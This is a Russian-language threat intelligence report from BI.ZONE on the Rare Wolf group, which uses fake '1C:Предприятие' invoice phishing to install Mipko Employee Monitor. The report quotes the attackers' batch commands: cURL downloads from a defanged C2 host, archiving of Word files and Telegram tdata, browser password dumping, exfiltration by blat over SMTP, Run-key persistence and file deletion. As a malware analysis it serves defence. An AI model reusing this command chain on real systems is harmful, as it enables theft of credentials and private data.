Rare Wolf охотится за приватными данными с помощью фальшивых накладных «1С:Предприятие»
Специалисты BI.ZONE Threat Intelligence обнаружили группировку, которая активна как минимум с 2019 года. Раньше атаки, связанные с этим кластером активности, были направлены на соседние страны, теперь под ударом и российские организации. Злоумышленники используют фишинговые письма, чтобы установить на целевые устройства легитимное средство слежения Mipko Employee Monitor, украсть конфиденциальные документы и пароли, получить доступ к мессенджеру Telegram.
- Использование нестандартных форматов вложений позволяет атакующим снизить бдительность жертв и увеличить вероятность компрометации.
- Взлом и кража аккаунтов Telegram пользуются особенной популярностью у злоумышленников, при этом для доступа к данным пользователей мессенджера им достаточно скопировать всего одну папку.
- Атакующие активно используют легитимные средства мониторинга: это позволяет им слиться со скомпрометированной IT‑инфраструктурой.
Злоумышленники рассылали фишинговые письма с архивами, в которых, по их словам, были накладные «1С:Предприятие», а также электронные ключи к ним. Это позволяло усыпить бдительность жертвы, отвлечь ее внимание от расширения файла. Письмо имело содержание, представленное на рисунке ниже.
Текст фишингового письма
В архиве находился исполняемый файл 1C.Предприятие Платежная накладная № 579823592352-2023.scr, являющийся установщиком Smart Install Maker.
Запуск исполняемого файла приводит к реализации следующих действий:
- Создание папки
C:\Intel\и установка ей атрибутов «Скрытый», «Системный», «Неиндексируемый». - Создание ключей Video Configurations и Mail Configurations в ветке реестра
Software\Microsoft\Windows\CurrentVersion\Run. Значения ключей устанавливаются как пути к файламC:\Intel\go.exeиC:\Intel\mail.exe, которые будут распакованы в дальнейшем. - Создание файла
C:\Intel\rezet.cmd, загружающего с управляющего сервера с помощью cURL зашифрованные архивы и исполняемый файлdriver.exeдля их распаковки:C:\Intel\curl.exe -o C:\Intel\driver.exe http://acountservices[.]nl/downs/driver.exe
C:\Intel\curl.exe -o C:\Intel\keys.rar http://acountservices[.]nl/downs/keys.rar
C:\Intel\curl.exe -o C:\Intel\MPK.rar http://acountservices[.]nl/downs/MPK.rar
C:\Intel\curl.exe -o C:\Intel\pas.rar http://acountservices[.]nl/downs/pas.rar
Кроме того, driver.exe используется для сбора и архивации всех документов Microsoft Word:
C:\Intel\driver.exe a -r -hplimpid2903392 C:\Intel\doc.rar C:\*.doc* /y
Также осуществляется сбор и упаковка данных мессенджера Telegram:
C:\Intel\driver.exe a -r -hplimpid2903392 C:\Intel\tdata.rar "C:\Users\[user]\AppData\Roaming\Telegram Desktop\tdata" /y
Отправка собранных данных осуществляется через электронную почту, подконтрольную злоумышленникам. Для этого из архива pas.rar извлекается утилита Blat — инструмент, позволяющий отправлять электронные письма с использованием командной строки:
C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\pas.rar blat.exe C:\Intel\ /y
После этого оба архива отправляются на электронную почту злоумышленников:
C:\Intel\blat.exe -to %mail-in% -f "TELEGRAM<%mail-out%>" -server smtp.acountservices[.]nl -port 587 -u %mail-out% -pw %pass-out% -subject "[redacted]" -body "[redacted]" -attach "C:\Intel\tdata.rar"
C:\Intel\blat.exe -to %mail-in% -f "DOCUMENT<%mail-out%>" -server smtp.acountservices[.]nl -port 587 -u %mail-out% -pw %pass-out% -subject "[redacted]" -body "[redacted]" -attach "C:\Intel\doc.rar"
После отправки архивы с собранными данными и утилита cURL удаляются:
del /q C:\Intel\curl.exe
del /q /f C:\Intel\doc.rar
del /q /f C:\Intel\tdata.rar
Затем из архива keys.rar извлекается файл go.exe. Происходит приостановка исполнения на час с помощью утилиты ping, после чего из архивов извлекаются файлы mail.exe и userprofile.exe. Последний запускается для установки ПО Mipko Employee Monitor в скомпрометированную систему:
C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\keys.rar go.exe C:\Intel\ /y
ping -n 3600 127.0.0.1
C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\pas.rar mail.exe C:\Intel\ /y
C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\keys.rar userprofile.exe C:\Intel\ /y
C:\Intel\userprofile.exe
После этого система принудительно перезагружается, а файл rezet.cmd удаляется:
wmic OS WHERE Primary="TRUE" CALL Win32Shutdown 6
del /q C:\Intel\rezet.cmd
После перезагрузки будут запущены файлы mail.exe и go.exe.
Запуск mail.exe приводит к реализации следующих действий:
- Осуществляется сбор паролей из браузеров на скомпрометированном устройстве в текстовый файл
password.txt. Для этого распаковывается ПО WebBrowserPassView из архиваpas.rar:C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\pas.rar wbpv.exe C:\Intel\ /y
C:\Intel\wbpv.exe /stext "C:\Intel\password.txt" - После получения паролей удаляются файлы, которые больше не требуются при выполнении:
del /q /f С:\Intel\wbpv.exe
del /q /f C:\Intel\pas.rar
del /q /f C:\Intel\rezet.cmd
del /q /f C:\Intel\driver.exe - Также удаляется ключ реестра, отвечающий за автозапуск
mail.exe:reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Mail Configurations" /f - Затем осуществляется проверка доступности сетевого ресурса
www.msftncsi.com/ncsi.txt. Если проверка успешная, полученные учетные данные пользователей отправляются злоумышленнику по почте с помощью утилиты Blat:curl www.msftncsi.com/ncsi.txt >nul
if "%errorlevel%"=="0" (
goto ok
) else (
goto no
)
:ok
C:\Intel\blat.exe -to %mail-in% -f "PASSWORD<%mail-out%>" -server [REDACTED] -port 587 -u %mail-out% -pw %pass-out% -subject "Password %COMPUTERNAME%/%USERNAME%" -body "Password %COMPUTERNAME%/%USERNAME%" -attach "C:\Intel\password.txt" - После чего удаляются файлы
go.exe,password.txtиblat.exe:del /q /f C:\Intel\go.exe
del /q /f C:\Intel\password.txt
del /q /f C:\Intel\blat.exe
Запуск go.exe приводит к реализации следующих действий:
- Удаление конфигурации Mipko Employee Monitor, если она присутствует в системе:
del /q /f %PROGRAMDATA%\MPK\S0000 - Распаковка всех файлов архива
keys.rarв папкуC:\Intel\:C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\keys.rar C:\Intel\ /y - Распаковка архива
MPK.rar, содержащего конфигурацию для подключения, в папкуC:\Users\[user]\AppData\Local\:C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\MPK.rar %PROGRAMDATA% /y - Перенос файла
C:\Users\[user]\AppData\Local\MPK\S0000.txtвC:\Users\[user]\AppData\Local\MPK\S0000:ren %PROGRAMDATA% \MPK\S0000.txt %PROGRAMDATA% \MPK\S0000 - Добавление ключа Userinit в ветке реестра
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Runдля запуска ПО Mipko Employee Monitor при старте системы:reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Userinit /t reg_sz /d "C:\Intel\userprofile.exe" /f - Запуск ПО Mipko Employee Monitor:
start C:\Intel\userprofile.exe - Удаление временных файлов, которые могут находиться в папке
C:\Intel\:del /q /f C:\Intel\MPK.rar
del /q /f C:\Intel\keys.rar
del /q /f C:\Intel\curl.exe
del /q /f C:\Intel\dc.exe
del /q /f C:\Intel\dc.rar
del /q /f C:\Intel\rezet.cmd
del /q /f C:\Intel\open.lnk
del /q /f C:\Intel\go.exe
del /q /f C:\Intel\go1.exe
del /q /f C:\Intel\mail.exe - Удаление ключа реестра, отвечающего за автозапуск
go.exe:reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Video Configurations" /f
ПО Mipko Employee Monitor позволяет атакующим контролировать активность пользователя, перехватывать нажатия и логи буфера обмена, делать снимки с экрана и камеры устройства.
Злоумышленники продолжают использовать программное обеспечение двойного назначения, а также легитимные инструменты для реализации целевых атак. Это часто позволяет им слиться со скомпрометированной IT‑инфраструктурой и обойти многие средства защиты. Кроме того, важно следить за ландшафтом угроз соседних стран: со временем атакующие в том числе под влиянием геополитических событий могут менять свои цели.
| Тактика | Техника | Процедура |
|---|---|---|
| Initial Access |
Phishing: Spearphishing Attachment |
Для получения первоначального доступа Rare Wolf используют электронные письма, содержащие вредоносные вложения |
| Execution |
User Execution: Malicious File |
Для инициализации процесса компрометации жертве необходимо запустить вредоносный файл |
|
Command and Scripting Interpreter: Windows Command Shell |
Rare Wolf используют файлы |
|
| Persistence |
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Rare Wolf используют ветки реестра, отвечающие за автозагрузку, для закрепления в системе |
| Privilege Escalation |
Abuse Elevation Control Mechanism: Bypass User Account Control |
Установщик Smart Install Maker запрашивает у пользователя привилегии администратора для привилегированного исполнения |
| Defense Evasion |
Abuse Elevation Control Mechanism: Bypass User Account Control |
Установщик Smart Install Maker запрашивает у пользователя привилегии администратора для привилегированного исполнения |
|
Hide Artifacts: Hidden Files and Directories |
Создается папка |
|
|
Indicator Removal: File Deletion |
Файл Файлы в папке |
|
|
Indicator Removal: Clear Persistence |
При выполнении |
|
|
Masquerading |
Исполняемые файлы, используемые Rare Wolf при получении первоначального доступа, маскируются под документы Microsoft Word |
|
|
Modify Registry |
Rare Wolf используют ветки реестра, отвечающие за автозагрузку, для закрепления в системе |
|
| Credential Access |
Credentials from Password Stores: Credentials from Web Browsers |
Rare Wolf загружают на скомпрометированное устройство программу WebBrowserPassView, используемую для получения учетных данных пользователей из браузеров |
|
Keylogging |
Mipko Employee Monitor позволяет злоумышленникам получать доступ к записям нажатий клавиш |
|
| Discovery |
File and Directory Discovery |
|
|
Process Discovery |
Mipko Employee Monitor позволяет злоумышленникам получать доступ к активности процессов, запущенных в системе |
|
|
Log Enumeration |
Mipko Employee Monitor получает доступ к логам Windows для сбора информации во время выполнения |
|
| Collection |
Archive Collected Data |
Полученные файлы, собранные |
|
Automated Collection |
Mipko Employee Monitor собирает данные на скомпрометированном устройстве без вмешательства атакующего |
|
|
Clipboard Data |
Mipko Employee Monitor позволяет злоумышленникам получать доступ к истории буфера обмена |
|
|
Data from Local System |
|
|
|
Data Staged: Local Data Staging |
Архивы с собранными файлами остаются в скомпрометированной системе до их отправки на управляющий сервер |
|
|
Screen Capture |
Mipko Employee Monitor позволяет злоумышленникам получать доступ к снимкам экрана, сделанным в скомпрометированной системе |
|
|
Video Capture |
Mipko Employee Monitor позволяет злоумышленникам получать доступ к камере, подключенной к скомпрометированной системе |
|
| Command and Control |
Application Layer Protocol: Mail Protocols |
|
|
Application Layer Protocol: Web Protocols |
Rare Wolf используют HTTP для загрузки инструментов |
|
|
Ingress Tool Transfer |
Все дополнительное ПО скачивается с управляющего сервера в виде архивов |
|
|
Remote Access Software |
Rare Wolf используют Mipko Employee Monitor для получения доступа к скомпрометированной системе |
acountservices[.]nl;53043bd27f47dbbe3e5ac691d8a586ab56a33f734356be9b8e49c7e975241a56;e6ea6ce923f2eee0cd56a0874e4a0ca467711b889553259a995df686bd35de86;e1e9b7182717f6851e7deb0aadf8f31c67bf43e2d8ef5b052e697f467ec2e3f3;4999f77a5a52d79dbb4b14dd7035aed21aecf85631ea20b91d7adf97f7b729e8;a49092711a56efc520416e53bbc9891092d1d970e154b923b7603083bbd7d870;a9eeffdad26eabe90fc32a79700af671daefd43eb7ecfb8f20ce4e667cbd8dcb.
Полный список индикаторов компрометации доступен пользователям платформы BI.ZONE Threat Intelligence.
Фишинговые рассылки — популярный вектор атаки на организации. Для защиты почты можно применять специализированные сервисы, помогающие фильтровать нежелательные письма. Одно из таких решений — BI.ZONE CESP. Оно избавляет компании от проблемы нелегитимных писем, инспектируя каждое электронное сообщение. При этом используется более 600 механизмов фильтрации, реализованных на основе машинного обучения, статистического, сигнатурного и эвристического анализа. Такая проверка не задерживает доставку безопасных писем.
Легитимными инструментами для атак на компании сегодня пользуются все чаще. Превентивные средства защиты не детектируют подобные попытки — злоумышленники проникают в инфраструктуру незамеченными. Для обнаружения таких обращений мы рекомендуем внедрять в компании практику выявления, реагирования и предупреждения киберугроз в составе центра мониторинга кибербезопасности, например BI.ZONE TDR.